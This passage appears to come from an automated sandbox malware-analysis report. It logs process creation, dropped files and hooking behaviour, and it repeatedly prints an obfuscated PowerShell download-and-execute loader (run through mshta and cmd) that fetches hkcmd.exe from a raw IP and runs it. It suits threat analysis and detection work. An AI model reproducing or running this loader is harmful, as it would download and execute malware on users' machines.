IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E54B37 LoadLibraryA,GetProcAddress,12_2_00E54B37
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_027856D2 push esp; ret 3_2_02785711
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E78945 push ecx; ret 12_2_00E78958
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\hkcmd.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\hkcmd[1].exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00E548D7
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00ED5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_00ED5376
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E73187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00E73187
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
